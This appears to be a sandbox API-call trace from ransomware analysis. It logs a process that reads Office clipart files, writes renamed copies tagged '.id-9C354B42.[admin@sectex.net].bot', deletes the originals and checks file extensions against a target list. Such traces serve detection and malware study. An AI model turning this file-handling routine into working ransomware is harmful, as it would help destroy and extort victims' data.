	[0169.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf")) returned 0x20
	[0169.502] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.502] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.502] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.503] GetLastError () returned 0x0
	[0169.503] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x85d0, lpOverlapped=0x0) returned 1
	[0169.510] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x85e0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x85e0, lpOverlapped=0x0) returned 1
	[0169.511] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.511] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.512] SetEndOfFile (hFile=0x354) returned 1
	[0169.512] CloseHandle (hObject=0x354) returned 1
	[0169.512] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.512] SetEndOfFile (hFile=0x118) returned 1
	[0169.514] CloseHandle (hObject=0x118) returned 1
	[0169.514] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.514] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153508.wmf")) returned 1
	[0169.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.515] lstrlenW (lpString=".doc") returned 4
	[0169.515] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.515] lstrlenW (lpString=".docx") returned 5
	[0169.515] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.515] lstrlenW (lpString=".pdf") returned 4
	[0169.515] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.515] lstrlenW (lpString=".xls") returned 4
	[0169.515] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.515] lstrlenW (lpString=".xlsx") returned 5
	[0169.515] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.515] lstrlenW (lpString=".ppt") returned 4
	[0169.515] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.515] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.515] lstrlenW (lpString=".zip") returned 4
	[0169.516] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.516] lstrlenW (lpString=".rar") returned 4
	[0169.516] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.516] lstrlenW (lpString=".bz2") returned 4
	[0169.516] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.516] lstrlenW (lpString=".7z") returned 3
	[0169.516] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.516] lstrlenW (lpString=".dbf") returned 4
	[0169.516] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.516] lstrlenW (lpString=".1cd") returned 4
	[0169.516] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.516] lstrlenW (lpString=".jpg") returned 4
	[0169.516] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.516] lstrlenW (lpString=".doc") returned 4
	[0169.516] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.516] lstrlenW (lpString=".docx") returned 5
	[0169.516] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.516] lstrlenW (lpString=".pdf") returned 4
	[0169.516] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.516] lstrlenW (lpString=".xls") returned 4
	[0169.516] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.516] lstrlenW (lpString=".xlsx") returned 5
	[0169.516] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.516] lstrlenW (lpString=".ppt") returned 4
	[0169.516] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.516] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.516] lstrlenW (lpString=".zip") returned 4
	[0169.516] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.516] lstrlenW (lpString=".rar") returned 4
	[0169.517] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.517] lstrlenW (lpString=".bz2") returned 4
	[0169.517] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.517] lstrlenW (lpString=".7z") returned 3
	[0169.517] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.517] lstrlenW (lpString=".dbf") returned 4
	[0169.517] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.517] lstrlenW (lpString=".1cd") returned 4
	[0169.517] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 63
	[0169.517] lstrlenW (lpString=".jpg") returned 4
	[0169.517] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.517] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.517] lstrlenW (lpString="J0153514.WMF") returned 12
	[0169.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153514.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.518] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=12752) returned 1
	[0169.518] CloseHandle (hObject=0x118) returned 1
	[0169.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153514.wmf")) returned 0x20
	[0169.518] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153514.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153514.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.518] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.518] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153514.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.521] GetLastError () returned 0x0
	[0169.521] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x31d0, lpOverlapped=0x0) returned 1
	[0169.524] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x31e0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x31e0, lpOverlapped=0x0) returned 1
	[0169.525] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.525] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.525] SetEndOfFile (hFile=0x354) returned 1
	[0169.525] CloseHandle (hObject=0x354) returned 1
	[0169.525] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.525] SetEndOfFile (hFile=0x118) returned 1
	[0169.527] CloseHandle (hObject=0x118) returned 1
	[0169.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.528] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153514.wmf")) returned 1
	[0169.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.528] lstrlenW (lpString=".doc") returned 4
	[0169.528] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.528] lstrlenW (lpString=".docx") returned 5
	[0169.529] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.529] lstrlenW (lpString=".pdf") returned 4
	[0169.529] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.529] lstrlenW (lpString=".xls") returned 4
	[0169.529] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.529] lstrlenW (lpString=".xlsx") returned 5
	[0169.529] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.529] lstrlenW (lpString=".ppt") returned 4
	[0169.529] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.529] lstrlenW (lpString=".zip") returned 4
	[0169.529] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.529] lstrlenW (lpString=".rar") returned 4
	[0169.529] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.529] lstrlenW (lpString=".bz2") returned 4
	[0169.529] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.529] lstrlenW (lpString=".7z") returned 3
	[0169.529] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.529] lstrlenW (lpString=".dbf") returned 4
	[0169.529] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.529] lstrlenW (lpString=".1cd") returned 4
	[0169.529] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.529] lstrlenW (lpString=".jpg") returned 4
	[0169.529] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.529] lstrlenW (lpString=".doc") returned 4
	[0169.529] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.529] lstrlenW (lpString=".docx") returned 5
	[0169.529] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.529] lstrlenW (lpString=".pdf") returned 4
	[0169.529] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.530] lstrlenW (lpString=".xls") returned 4
	[0169.530] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.530] lstrlenW (lpString=".xlsx") returned 5
	[0169.530] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.530] lstrlenW (lpString=".ppt") returned 4
	[0169.530] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.530] lstrlenW (lpString=".zip") returned 4
	[0169.530] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.530] lstrlenW (lpString=".rar") returned 4
	[0169.530] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.530] lstrlenW (lpString=".bz2") returned 4
	[0169.530] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.530] lstrlenW (lpString=".7z") returned 3
	[0169.530] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.530] lstrlenW (lpString=".dbf") returned 4
	[0169.530] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.530] lstrlenW (lpString=".1cd") returned 4
	[0169.530] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 63
	[0169.530] lstrlenW (lpString=".jpg") returned 4
	[0169.530] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.530] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.530] lstrlenW (lpString="J0153516.WMF") returned 12
	[0169.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.531] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=7432) returned 1
	[0169.531] CloseHandle (hObject=0x118) returned 1
	[0169.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf")) returned 0x20
	[0169.531] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.531] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.531] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.532] GetLastError () returned 0x0
	[0169.532] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1d08, lpOverlapped=0x0) returned 1
	[0169.535] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1d10, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1d10, lpOverlapped=0x0) returned 1
	[0169.535] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.536] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.536] SetEndOfFile (hFile=0x354) returned 1
	[0169.536] CloseHandle (hObject=0x354) returned 1
	[0169.536] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.536] SetEndOfFile (hFile=0x118) returned 1
	[0169.538] CloseHandle (hObject=0x118) returned 1
	[0169.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.538] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153516.wmf")) returned 1
	[0169.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.539] lstrlenW (lpString=".doc") returned 4
	[0169.539] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.539] lstrlenW (lpString=".docx") returned 5
	[0169.539] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0169.539] lstrlenW (lpString=".pdf") returned 4
	[0169.539] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.539] lstrlenW (lpString=".xls") returned 4
	[0169.539] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.539] lstrlenW (lpString=".xlsx") returned 5
	[0169.539] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0169.539] lstrlenW (lpString=".ppt") returned 4
	[0169.539] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.539] lstrlenW (lpString=".zip") returned 4
	[0169.539] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.539] lstrlenW (lpString=".rar") returned 4
	[0169.539] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.539] lstrlenW (lpString=".bz2") returned 4
	[0169.539] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.539] lstrlenW (lpString=".7z") returned 3
	[0169.539] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.539] lstrlenW (lpString=".dbf") returned 4
	[0169.539] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.539] lstrlenW (lpString=".1cd") returned 4
	[0169.539] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.540] lstrlenW (lpString=".jpg") returned 4
	[0169.540] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.540] lstrlenW (lpString=".doc") returned 4
	[0169.540] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.540] lstrlenW (lpString=".docx") returned 5
	[0169.540] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0169.540] lstrlenW (lpString=".pdf") returned 4
	[0169.540] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.540] lstrlenW (lpString=".xls") returned 4
	[0169.540] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.540] lstrlenW (lpString=".xlsx") returned 5
	[0169.540] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0169.540] lstrlenW (lpString=".ppt") returned 4
	[0169.540] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.540] lstrlenW (lpString=".zip") returned 4
	[0169.540] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.540] lstrlenW (lpString=".rar") returned 4
	[0169.540] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.540] lstrlenW (lpString=".bz2") returned 4
	[0169.540] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.540] lstrlenW (lpString=".7z") returned 3
	[0169.540] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.540] lstrlenW (lpString=".dbf") returned 4
	[0169.540] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.540] lstrlenW (lpString=".1cd") returned 4
	[0169.540] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 63
	[0169.541] lstrlenW (lpString=".jpg") returned 4
	[0169.541] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.541] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.541] lstrlenW (lpString="J0153518.WMF") returned 12
	[0169.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.541] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=12528) returned 1
	[0169.541] CloseHandle (hObject=0x118) returned 1
	[0169.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf")) returned 0x20
	[0169.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
